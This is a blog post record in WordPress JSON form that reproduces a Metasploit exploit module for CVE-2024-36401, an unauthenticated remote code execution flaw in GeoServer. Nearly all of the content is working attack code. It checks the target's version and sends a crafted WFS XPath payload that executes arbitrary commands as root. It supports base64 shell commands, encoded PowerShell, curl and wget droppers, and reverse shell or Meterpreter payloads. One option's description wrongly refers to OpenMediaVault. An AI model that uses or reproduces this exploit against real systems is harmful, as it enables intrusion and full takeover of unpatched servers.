{"id":58192,"date":"2024-07-15T23:49:32","date_gmt":"2024-07-15T20:49:32","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179547\/geoserver_unauth_rce_cve_2024_36401.rb.txt"},"modified":"2024-07-15T23:49:32","modified_gmt":"2024-07-15T20:49:32","slug":"geoserver-unauthenticated-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/geoserver-unauthenticated-remote-code-execution\/","title":{"rendered":"Geoserver Unauthenticated Remote Code Execution"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘Geoserver unauthenticated Remote Code Execution’,
‘Description’ => %q{
GeoServer is an open-source software server written in Java that provides
the ability to view, edit, and share geospatial data.
It is designed to be a flexible, efficient solution for distributing geospatial data
from a variety of sources such as Geographic Information System (GIS) databases,
web-based data, and personal datasets.
In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
through specially crafted input against a default GeoServer installation due to unsafely
evaluating property names as XPath expressions.
An attacker can abuse this by sending a POST request with a malicious xpath expression
to execute arbitrary commands as root on the system.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘h00die-gr3y <h00die.gr3y[at]gmail.com>’, # MSF module contributor
‘jheysel-r7’, # MSF module Windows support
‘Steve Ikeoka’ # Discovery
],
‘References’ => [
[‘CVE’, ‘2024-36401’],
[‘URL’, ‘https:\/\/github.com\/geoserver\/geoserver\/security\/advisories\/GHSA-6jj6-gm7p-fcvv’],
[‘URL’, ‘https:\/\/github.com\/vulhub\/vulhub\/tree\/master\/geoserver\/CVE-2024-36401’],
[‘URL’, ‘https:\/\/attackerkb.com\/topics\/W6IDY2mmp9\/cve-2024-36401’]],
‘DisclosureDate’ => ‘2024-07-01’,
‘Platform’ => [‘unix’, ‘linux’],
‘Arch’ => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
‘Privileged’ => true,
‘Targets’ => [
[
‘Unix Command’,
{
‘Platform’ => [‘unix’, ‘linux’],
‘Arch’ => ARCH_CMD,
‘Type’ => :unix_cmd
# Tested with cmd\/unix\/reverse_bash
}
],
[
‘Linux Dropper’,
{
‘Platform’ => [‘linux’],
‘Arch’ => [ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
‘Type’ => :linux_dropper,
‘Linemax’ => 16384,
‘CmdStagerFlavor’ => [‘curl’, ‘wget’, ‘echo’, ‘printf’, ‘bourne’]# Tested with linux\/x64\/meterpreter_reverse_tcp
}
],
[
‘Windows Command’,
{
‘Platform’ => [‘Windows’],
‘Arch’ => ARCH_CMD,
‘Type’ => :win_cmd
# Tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp
}
],
],
‘DefaultTarget’ => 0,
‘DefaultOptions’ => {
‘RPORT’ => 8080,
‘SSL’ => false
},
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘Reliability’ => [REPEATABLE_SESSION],
‘SideEffects’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]}
)
)
register_options(
[
OptString.new(‘TARGETURI’, [true, ‘The URI path of the OpenMediaVault web application’, ‘\/’])
])
end<\/p>\n

def check_version
print_status(‘Trying to detect if target is running a vulnerable version of GeoServer.’)
res = send_request_cgi!({
‘uri’ => normalize_uri(target_uri.path, ‘geoserver’, ‘web’, ‘wicket’, ‘bookmarkable’, ‘org.geoserver.web.AboutGeoServerPage’),
‘keep_cookies’ => true,
‘method’ => ‘GET’
})
return nil unless res && res.code == 200 && res.body.include?(‘GeoServer Version’)<\/p>\n

html = res.get_html_document
unless html.blank?
# html identifier for Geoserver version information: <span id=”version”>2.23.2<\/span>
version = html.css(‘span[id=”version”]’)
return Rex::Version.new(version[0].text) unless version[0].nil?
end
nil
end<\/p>\n

def get_valid_featuretype
allowed_feature_types = [‘sf:archsites’, ‘sf:bugsites’, ‘sf:restricted’, ‘sf:roads’, ‘sf:streams’, ‘ne:boundary_lines’, ‘ne:coastlines’, ‘ne:countries’, ‘ne:disputed_areas’, ‘ne:populated_places’]res = send_request_cgi!({
‘uri’ => normalize_uri(target_uri.path, ‘geoserver’, ‘wfs’),
‘method’ => ‘GET’,
‘ctype’ => ‘application\/xml’,
‘keep_cookies’ => true,
‘vars_get’ => {
‘request’ => ‘ListStoredQueries’,
‘service’ => ‘wfs’
}
})
return nil unless res && res.code == 200 && res.body.include?(‘ListStoredQueriesResponse’)<\/p>\n

xml = res.get_xml_document
unless xml.blank?
xml.remove_namespaces!
# get all the FeatureTypes and store them in an array of strings
retrieved_feature_types = xml.xpath(‘\/\/ReturnFeatureType’)
# shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer
# return the feature type if a match is found in the allowed_feature_types array
retrieved_feature_types.to_a.shuffle.each do |feature_type|
return feature_type.text if allowed_feature_types.include?(feature_type.text)
end
end
nil
end<\/p>\n

def create_payload(cmd)
# get a valid feature type and fail back to a default if not successful
feature_type = get_valid_featuretype
feature_type = ‘sf:archsites’ if feature_type.nil?<\/p>\n

case target[‘Type’]when :unix_cmd || :linux_dropper
# create customised b64 encoded payload
# ‘Encoder’ => ‘cmd\/base64’ does not work in this particular use case
cmd_b64 = Base64.strict_encode64(cmd)
cmd = “sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh”
when :win_cmd
enc_cmd = Base64.strict_encode64(“cmd \/C –% #{payload.encoded}”.encode(‘UTF-16LE’))
cmd = “powershell.exe -e #{enc_cmd}”
end<\/p>\n

return <<~EOS
<wfs:GetPropertyValue service=’WFS’ version=’2.0.0′
xmlns:topp=’http:\/\/www.openplans.org\/topp’
xmlns:fes=’http:\/\/www.opengis.net\/fes\/2.0′
xmlns:wfs=’http:\/\/www.opengis.net\/wfs\/2.0′>
<wfs:Query typeNames=”#{feature_type}”\/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(), “#{cmd}”)<\/wfs:valueReference>
<\/wfs:GetPropertyValue>
EOS
end<\/p>\n

def execute_command(cmd, _opts = {})
res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, ‘geoserver’, ‘wfs’),
‘method’ => ‘POST’,
‘ctype’ => ‘application\/xml’,
‘keep_cookies’ => true,
‘data’ => create_payload(cmd)
})
fail_with(Failure::PayloadFailed, ‘Payload execution failed.’) unless res && res.code == 400 && res.body.include?(‘ClassCastException’)
end<\/p>\n

def check
version_number = check_version
return CheckCode::Unknown(‘Could not retrieve the version information.’) if version_number.nil?
return CheckCode::Appears(“Version #{version_number}”) if version_number.between?(Rex::Version.new(‘2.25.0’), Rex::Version.new(‘2.25.1’)) || version_number.between?(Rex::Version.new(‘2.24.0’), Rex::Version.new(‘2.24.3’)) || version_number < Rex::Version.new(‘2.23.6’)<\/p>\n

CheckCode::Safe(“Version #{version_number}”)
end<\/p>\n

def exploit
print_status(“Executing #{target.name} for #{datastore[‘PAYLOAD’]}”)<\/p>\n

case target[‘Type’]when :unix_cmd, :win_cmd
execute_command(payload.encoded)
when :linux_dropper
# don’t check the response here since the server won’t respond
# if the payload is successfully executed.
execute_cmdstager({ linemax: target.opts[‘Linemax’] })
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankingprepend Msf::Exploit::Remote::AutoCheckinclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::CmdStager def initialize(info = {})super(update_info(info,‘Name’ => ‘Geoserver unauthenticated Remote Code Execution’,‘Description’ => %q{GeoServer is an open-source software server written in Java that providesthe ability to view, edit, and share geospatial data.It is designed to be a flexible, efficient …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58192","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58192"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58192\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58192"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}